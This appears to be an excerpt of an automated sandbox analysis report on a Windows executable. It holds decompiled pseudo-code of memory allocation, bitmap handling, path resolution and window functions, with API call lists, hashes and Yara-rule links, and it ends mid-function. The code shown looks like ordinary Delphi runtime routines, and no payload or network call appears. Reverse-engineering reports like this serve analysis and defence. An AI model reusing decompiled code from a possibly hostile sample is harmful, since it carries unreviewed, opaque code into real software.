                                                                                Function 0041C940, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0041C940(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x487a20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x487a1c; // 0x700000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402994(0x46b4bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041C938(_t2, E0041C918);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041C938(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x487a20;
						 *0x487a20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x487a1c = _t35;
				}
				_t25 =  *0x487a20;
				 *0x487a20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x487a20;
			}








                                                                                0x0041c94e
                                                                                0x0041c95e
                                                                                0x0041c963
                                                                                0x0041c965
                                                                                0x0041c96a
                                                                                0x0041c96c
                                                                                0x0041c979
                                                                                0x0041c983
                                                                                0x0041c98b
                                                                                0x0041c98e
                                                                                0x0041c98e
                                                                                0x0041c991
                                                                                0x0041c991
                                                                                0x0041c994
                                                                                0x0041c99e
                                                                                0x0041c9a3
                                                                                0x0041c9a6
                                                                                0x0041c9a8
                                                                                0x0041c9af
                                                                                0x0041c9b6
                                                                                0x0041c9b6
                                                                                0x0041c9be
                                                                                0x0041c9c3
                                                                                0x0041c9c8
                                                                                0x0041c9ce
                                                                                0x0041c9d5

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction ID: 28b28392519e15f92a9e572b18f021e7989893867b799864ec383581726918ff
                                                                                • Opcode Fuzzy Hash: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction Fuzzy Hash: B21136B42443059BD710DF19CCC1B86B7E4EB48390F20C93AE9999B786D378E9418BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 0042308C, Relevance: 60.0, APIs: 32, Strings: 2, Instructions: 500windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E0042308C(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				char _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				char _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E00422C48(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							E0042009C();
						}
						_v28 = E004201BC(GetDC(0));
						_v32 = E004201BC(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0x4236da);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E0040272C(0x42c);
							_push(_t457);
							_push(0x4233e4);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							_t55 = _a8 + 0x18; // 0x18
							memcpy(_v40, _t55, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E00423040(_a8);
										_t441 =  &(_v40->bmiColors);
										E00402994(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											_t93 =  &_v24; // 0x42394f
											SelectObject(_v32,  *_t93);
										}
									} else {
										_t441 =  &(_v40->bmiColors);
										E00420950(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E004201BC(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								E00420114(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0x4233eb);
								return E0040274C(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E00403E2C();
								E00403E2C();
								goto L61;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E004201BC(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E004201BC(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E004201BC(_v20);
							_v24 = E004201BC(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0x42368b);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0x42367a);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0x423658);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E0041F36C( *((intOrPtr*)(_a4 + 0x14)));
								_t142 =  &_v156; // 0x423658
								E00412984(0,  *(_a8 + 4), 0, _t142,  *(_a8 + 8));
								_t145 =  &_v156; // 0x423658
								FillRect(_v32, _t145, _t366);
								SetTextColor(_v32, E0041E68C( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E0041E68C(E0041F330( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E0041E68C( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E0041E68C(E0041F330( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(E0042365F);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E004201BC(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0x42362e);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E004201BC(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E0041E68C( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E0041E68C(E0041F330( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E004201BC(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0x423635);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L61;
					}
				} else {
					L61:
					return _v20;
				}
			}






































                                                                                0x0042308d
                                                                                0x0042308f
                                                                                0x00423095
                                                                                0x00423098
                                                                                0x0042309b
                                                                                0x0042309e
                                                                                0x004230a3
                                                                                0x004230ad
                                                                                0x004230d0
                                                                                0x004230ef
                                                                                0x004230f6
                                                                                0x004230fd
                                                                                0x00423116
                                                                                0x00423116
                                                                                0x00423127
                                                                                0x00423138
                                                                                0x0042313d
                                                                                0x0042313e
                                                                                0x00423143
                                                                                0x00423146
                                                                                0x00423150
                                                                                0x004231ba
                                                                                0x004231bf
                                                                                0x004231c0
                                                                                0x004231c5
                                                                                0x004231c8
                                                                                0x004231ce
                                                                                0x004231d8
                                                                                0x004231e6
                                                                                0x004231ee
                                                                                0x004231fb
                                                                                0x00423200
                                                                                0x00423207
                                                                                0x00423207
                                                                                0x00423211
                                                                                0x0042321b
                                                                                0x00423226
                                                                                0x0042322f
                                                                                0x00423232
                                                                                0x0042323d
                                                                                0x0042330d
                                                                                0x00423315
                                                                                0x00423320
                                                                                0x00423327
                                                                                0x0042332c
                                                                                0x00423334
                                                                                0x00423342
                                                                                0x00423342
                                                                                0x00423317
                                                                                0x00423317
                                                                                0x0042331e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042331e
                                                                                0x00423243
                                                                                0x0042324b
                                                                                0x00423279
                                                                                0x00423297
                                                                                0x004232aa
                                                                                0x004232b1
                                                                                0x004232e6
                                                                                0x004232f6
                                                                                0x004232b9
                                                                                0x004232cb
                                                                                0x004232d0
                                                                                0x004232d3
                                                                                0x004232d3
                                                                                0x004232fb
                                                                                0x00423303
                                                                                0x00423303
                                                                                0x0042327b
                                                                                0x0042327e
                                                                                0x00423289
                                                                                0x00423289
                                                                                0x00423259
                                                                                0x0042325c
                                                                                0x0042325e
                                                                                0x0042326a
                                                                                0x0042326a
                                                                                0x0042324b
                                                                                0x00423363
                                                                                0x0042336a
                                                                                0x0042336c
                                                                                0x0042336c
                                                                                0x00423375
                                                                                0x004233d0
                                                                                0x004233d3
                                                                                0x004233d6
                                                                                0x004233e3
                                                                                0x0042339a
                                                                                0x004233aa
                                                                                0x004233ba
                                                                                0x004233bf
                                                                                0x004233c4
                                                                                0x00000000
                                                                                0x004233c4
                                                                                0x00423152
                                                                                0x00423164
                                                                                0x004231a8
                                                                                0x00423166
                                                                                0x00423184
                                                                                0x00423184
                                                                                0x004233ee
                                                                                0x00423405
                                                                                0x0042340a
                                                                                0x0042340b
                                                                                0x00423410
                                                                                0x00423413
                                                                                0x00423418
                                                                                0x00423419
                                                                                0x0042341e
                                                                                0x00423421
                                                                                0x00423426
                                                                                0x00423429
                                                                                0x0042342f
                                                                                0x00423440
                                                                                0x00423447
                                                                                0x00423447
                                                                                0x0042344e
                                                                                0x0042344f
                                                                                0x00423454
                                                                                0x00423457
                                                                                0x0042345e
                                                                                0x00423534
                                                                                0x00423464
                                                                                0x0042346a
                                                                                0x00423477
                                                                                0x00423488
                                                                                0x0042348d
                                                                                0x00423498
                                                                                0x004234b0
                                                                                0x004234ca
                                                                                0x004234d7
                                                                                0x004234f0
                                                                                0x00423503
                                                                                0x00423512
                                                                                0x00423512
                                                                                0x004234d7
                                                                                0x0042353d
                                                                                0x00423637
                                                                                0x0042363a
                                                                                0x0042363d
                                                                                0x00423646
                                                                                0x00000000
                                                                                0x00423652
                                                                                0x00423657
                                                                                0x00423543
                                                                                0x00423551
                                                                                0x00423556
                                                                                0x00423557
                                                                                0x0042355c
                                                                                0x0042355f
                                                                                0x00423574
                                                                                0x0042357a
                                                                                0x0042358b
                                                                                0x00423591
                                                                                0x00423591
                                                                                0x0042359a
                                                                                0x004235af
                                                                                0x004235c9
                                                                                0x004235c9
                                                                                0x004235f1
                                                                                0x004235fa
                                                                                0x00423603
                                                                                0x00423603
                                                                                0x00423612
                                                                                0x00423619
                                                                                0x0042361c
                                                                                0x0042361f
                                                                                0x0042362d
                                                                                0x0042362d
                                                                                0x0042353d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004236e1
                                                                                0x004236e1
                                                                                0x004236ea
                                                                                0x004236ea

                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,00000054,?), ref: 0042310C
                                                                                • GetDC.USER32(00000000), ref: 0042311D
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0042312E
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042317A
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0042319E
                                                                                • SelectObject.GDI32(00000000,?), ref: 004233FB
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0042343B
                                                                                • RealizePalette.GDI32(00000000), ref: 00423447
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 004234B0
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004234CA
                                                                                • SetDIBColorTable.GDI32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00423658,?,00000000,0042367A), ref: 00423512
                                                                                • FillRect.USER32 ref: 00423498
                                                                                  • Part of subcall function 0041E68C: GetSysColor.USER32(?), ref: 0041E696
                                                                                • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 00423534
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00423547
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042356A
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 00423586
                                                                                • RealizePalette.GDI32(?), ref: 00423591
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004235AF
                                                                                • SetBkColor.GDI32(?,00000000), ref: 004235C9
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004235F1
                                                                                • SelectPalette.GDI32(?,00000000,000000FF), ref: 00423603
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042360D
                                                                                • DeleteDC.GDI32(?), ref: 00423628
                                                                                  • Part of subcall function 0041F36C: CreateBrushIndirect.GDI32(?), ref: 0041F416
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                                • String ID: O9B$X6B
                                                                                • API String ID: 1299887459-1918398730
                                                                                • Opcode ID: 337899b110d8e44155190b4d493529486f2c8e141b0128cb09fcebc361404379
                                                                                • Instruction ID: 69607caf7539a41bed6a4c2d19560975605044106fb116b03be2fe6c642a9b26
                                                                                • Opcode Fuzzy Hash: 337899b110d8e44155190b4d493529486f2c8e141b0128cb09fcebc361404379
                                                                                • Instruction Fuzzy Hash: 1D120B71A00218AFDB10EFA9D885F9EB7F8EB08315F518456F914EB291C778EE41CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405AC0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00405AC0(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AAC(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AAC(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401310();
									while( *_t93 != 0) {
										_t90 = E00405AAC(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401310();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401318();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401310();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401318();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401310();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401310();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                                0x00405acc
                                                                                0x00405acf
                                                                                0x00405ad5
                                                                                0x00405ae2
                                                                                0x00405ae6
                                                                                0x00405b28
                                                                                0x00405b2e
                                                                                0x00405b6b
                                                                                0x00000000
                                                                                0x00405b30
                                                                                0x00405b37
                                                                                0x00405b48
                                                                                0x00405b4d
                                                                                0x00405b53
                                                                                0x00405b5b
                                                                                0x00405b60
                                                                                0x00405b6e
                                                                                0x00405b70
                                                                                0x00405b76
                                                                                0x00405b7a
                                                                                0x00405b81
                                                                                0x00405b82
                                                                                0x00405c2d
                                                                                0x00405b94
                                                                                0x00405b98
                                                                                0x00405ba5
                                                                                0x00405bac
                                                                                0x00405bad
                                                                                0x00405bb6
                                                                                0x00405bb7
                                                                                0x00405bcf
                                                                                0x00405bd4
                                                                                0x00405bd7
                                                                                0x00405bdc
                                                                                0x00405be2
                                                                                0x00405be3
                                                                                0x00405bf3
                                                                                0x00405bf5
                                                                                0x00405c05
                                                                                0x00405c0c
                                                                                0x00405c16
                                                                                0x00405c17
                                                                                0x00405c1c
                                                                                0x00405c22
                                                                                0x00405c23
                                                                                0x00405c29
                                                                                0x00405c2b
                                                                                0x00000000
                                                                                0x00405c2b
                                                                                0x00405bf3
                                                                                0x00405bd4
                                                                                0x00000000
                                                                                0x00405ba5
                                                                                0x00405c39
                                                                                0x00405c40
                                                                                0x00405c44
                                                                                0x00405c45
                                                                                0x00405c45
                                                                                0x00405b60
                                                                                0x00405b4d
                                                                                0x00405b37
                                                                                0x00405ae8
                                                                                0x00405af3
                                                                                0x00405af7
                                                                                0x00000000
                                                                                0x00405af9
                                                                                0x00405af9
                                                                                0x00405b04
                                                                                0x00405b08
                                                                                0x00405b0d
                                                                                0x00000000
                                                                                0x00405b0f
                                                                                0x00405b12
                                                                                0x00405b19
                                                                                0x00405b1d
                                                                                0x00405b1e
                                                                                0x00405b1e
                                                                                0x00405b0d
                                                                                0x00405af7
                                                                                0x00405c4a
                                                                                0x00405c53

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405ADD
                                                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405AEE
                                                                                • lstrcpyn.KERNEL32(?,?,?,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B1E
                                                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405B82
                                                                                • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001), ref: 00405BB7
                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D), ref: 00405BCA
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000), ref: 00405BD7
                                                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20), ref: 00405BE3
                                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C17
                                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C23
                                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C45
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                • API String ID: 3245196872-1565342463
                                                                                • Opcode ID: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction ID: 296a13db2414833b3bf80d2bdfa437c82c634a9cd7f8270e4b53d567bb21fe4a
                                                                                • Opcode Fuzzy Hash: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction Fuzzy Hash: BD416072900619ABEB10DAA8CC85EDFB7EDDF44314F1405B7B949F7281D638AE408F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00451994, Relevance: 18.4, APIs: 12, Instructions: 407windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E00451994(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x451efe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x486dc0; // 0x41cc74
					E00406520(_t294,  &_v12);
					E0040A0B0(_v12, 1);
					E00403D80();
				}
				_t149 =  *0x487bfc; // 0x22e1310
				E00455F6C(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x451ee1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x451de8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x487c00; // 0x22e0f1c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00450B80(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043BD14(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043BD14(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044C7E0(E0043BD14(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043BD14(_v8), 0);
								} else {
									SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
